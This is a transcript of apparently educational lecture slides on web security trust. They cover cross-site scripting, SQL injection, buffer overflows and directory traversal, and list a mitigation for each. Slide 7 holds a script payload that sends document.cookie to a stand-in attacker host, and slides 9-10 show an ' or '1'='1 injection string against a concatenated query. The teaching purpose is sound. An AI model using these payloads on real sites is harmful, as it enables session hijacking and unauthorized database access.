Trust - PowerPoint PPT Presentation

About This Presentation
Title:

Trust

Description:

Buffer Overflows. Technique: writes more data to a buffer than the buffer can hold. Stack vs. Heap overflows. Mitigation. Validate and filter user input ... – PowerPoint PPT presentation

Slides: 17
Provided by: andy83
Learn more at: https://www.cs.odu.edu

Transcript and Presenter's Notes

1
Trust
  • Glen Dorton

2
Or I may be paranoid, but they really are out to get me

3
Agenda
  • Introduction
  • Technical
  • Non-technical
  • Questions

4
Attacks
  • Cross site scripting
  • SQL Injection
  • Buffer Overflows
  • Others

5
Cross Site Scripting
  • What is it and how does it work?
  • What can be done with it?
  • How to mitigate the risk?

6
Cross Site Scripting
  • Script tags are embedded in an HTML response that
    is sent back to the user
  • Access information related to the vulnerable site:
    cookies, session information
  • Mitigation
  • Validate and filter all user input
  • Disable scripting
  • Application firewalls

7
Cross Site Scripting
  • Example
  • <script>window.open("http://attackersite.com/savecookie.cgi?cookie=" + document.cookie)</script>

8
SQL Injection
  • Embed SQL statements in HTTP requests
  • Access information in application database
  • Mitigation
  • Validate and filter all user input
  • Parameterized stored procedures

9
SQL Injection
  • SQL Query looks like this
  • SqlStr = "Select * from users where user_id = '" + p_user + "' and password = '" + p_pass + "'"
  • Example: in the password box type in
  • ' or '1'='1

10
SQL Injection
  • Final SQL Query looks like this
  • Select * from users where user_id = 'username' and password = '' or '1'='1'
  • Returns all rows from the users table
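To make slides 8 to 10 concrete, here is an added example (not from the presentation) that builds the slide 9 query both ways against a constructed in-memory SQLite table: by string concatenation, and with bound parameters as the "parameterized" mitigation recommends. The table contents, function names and the sample passwords are all assumptions made for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data: three users, plaintext passwords for brevity."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (user_id text, password text)")
    conn.executemany(
        "insert into users values (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55")],
    )
    return conn


def login_concat(conn, p_user, p_pass):
    """Vulnerable: the slide 9 query, assembled by string concatenation.
    The input becomes part of the SQL text, so quotes in it change the query."""
    sql = ("select * from users where user_id = '" + p_user +
           "' and password = '" + p_pass + "'")
    return conn.execute(sql).fetchall()


def login_param(conn, p_user, p_pass):
    """Mitigated: same query, but the values travel as bound parameters.
    The driver never lets them alter the statement structure."""
    sql = "select * from users where user_id = ? and password = ?"
    return conn.execute(sql, (p_user, p_pass)).fetchall()


def demo():
    """Row counts for a correct password and for the slide 9 password-box input."""
    conn = make_db()
    injected = "' or '1'='1"  # the string typed into the password box on slide 9
    return {
        "concat_good": len(login_concat(conn, "alice", "s3cret")),
        "concat_injected": len(login_concat(conn, "alice", injected)),  # every row
        "param_good": len(login_param(conn, "alice", "s3cret")),
        "param_injected": len(login_param(conn, "alice", injected)),  # no row
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s)")
```

With concatenation the final statement is exactly the slide 10 query, and `and` binds tighter than `or`, so the `'1'='1'` clause matches every user; the parameterized version treats the same text as a literal password and matches nothing.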

11
Buffer Overflows
  • Technique: writes more data to a buffer than the
    buffer can hold
  • Stack vs. Heap overflows
  • Mitigation
  • Validate and filter user input
  • Stack smashing protection - validates stack has
    not been altered on function return
  • No Execute Bit

12
Directory Traversal
  • Attackers attempt to access folders above the
    folder in which the web application is located
  • Mitigation: don't write web applications that
    rely on directory traversal or relative paths

13
Bad Idea
  • Online shopping sites that pass the price to the
    browser and then use it to calculate the customer
    cost when they add an item to their cart.
  • NEVER trust input from the user

14
Non-technical
  • So who do you trust?

15
Non-technical
  • TRUST NO ONE

16
Questions?